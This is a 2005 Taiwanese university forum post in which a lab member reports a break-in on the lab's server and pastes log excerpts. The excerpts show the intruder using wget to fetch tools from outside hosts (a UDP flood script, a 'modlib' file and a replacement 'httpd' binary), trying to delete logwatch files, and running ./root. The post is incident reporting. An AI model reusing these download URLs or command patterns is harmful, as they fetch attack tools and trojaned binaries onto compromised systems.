作者Donnie ( XD)
看板NTUGIEE_EDA
标题Re: eda.ee
时间Tue Mar 29 11:15:17 2005
※ 引述《Donnie ( XD)》之铭言:
: ※ 引述《Donnie ( XD)》之铭言:
: : 我早上到学校,想看是什麽 process 在搞鬼.....
: : 可是被 fish 重开机了 XD
: 确定我们的电脑遭受攻击!
第一次攻击:
Mar 24 05:40:08
已经成功入侵
下载
http://members.lycos.co.uk/cutegirlrulez/modlib
--05:40:08--
http://members.lycos.co.uk/cutegirlrulez/modlib
=> `modlib'
Resolving members.lycos.co.uk... 212.78.204.20
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36,037 [text/plain]
0K .......... .......... .......... ..... 100% 28.0K
接着想要删除 logwatch
rm: cannot remove `logwatch.XX4h0y7I': Operation not permitted
rm: cannot remove `logwatch.XXZPy8si': Operation not permitted
rm: cannot remove `logwatch.XXyBBEhX': Operation not permitted
sh: line 1: cd: /tmp/...: No such file or directory
sh: line 1: ./udp.pl: No such file or directory
udp.pl: no process killed
udp.pl: no process killed
cat: sun.pl: No such file or directory
ls: /tmp/hat: No such file or directory
ls: /tmp/ps: No such file or directory
cat: ps.pid: No such file or directory
sh: line 1: ./root: No such file or directory
--08:22:40--
http://www.packetstormsecurity.nl/DoS/udp.pl
=> `udp.pl'
Resolving www.packetstormsecurity.nl... 213.206.75.252
Connecting to www.packetstormsecurity.nl[213.206.75.252]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,089 [text/plain]
0K . 100%
08:22:41 (10.39 MB/s) - `udp.pl' saved [1089/1089]
udp.pl: no process killed
[Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 15:02:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec)
要取得 root 权限了!!
[Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31070 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 32450 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 300 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 2596 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 476 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 19310 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18911 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18912 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 12729 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 31206 still did not exit, sending a SIGTERM
[Sun Mar 27 14:57:33 2005] [warn] child process 18913 still did not exit, sending a SIGTERM
[Sun Mar 27 15:02:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec)
[Sun Mar 27 15:02:32 2005] [notice] Digest: generating secret for digest authentication ...
[Sun Mar 27 15:02:32 2005] [notice] Digest: done
[Sun Mar 27 15:02:33 2005] [notice] Apache-AdvancedExtranetServer/2.0.48 (Mandrake Linux/6mdk) mod_perl/1.99_11 Perl/v5.8.3 mod_ssl/2.0.48 OpenSSL/0.9.7c PHP/4.3.4 configured -- resuming normal operations
[Sun Mar 27 15:06:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec)
[Sun Mar 27 15:06:32 2005] [notice] Digest: generating secret for digest authentication ...
[Sun Mar 27 15:06:32 2005] [notice] Digest: done
换掉 apache!
--01:09:42--
http://luksuss.republika.pl/httpd
=> `httpd'
Resolving luksuss.republika.pl... 213.180.128.160
Connecting to luksuss.republika.pl[213.180.128.160]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36,040 [text/plain]
0K .......... .......... .......... ..... 100% 16.1K
01:09:46 (16.13 KB/s) - `httpd' saved [36040/36040]
我要查查是什麽漏洞
还好我们有FW,不然可能更惨!
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 140.112.48.60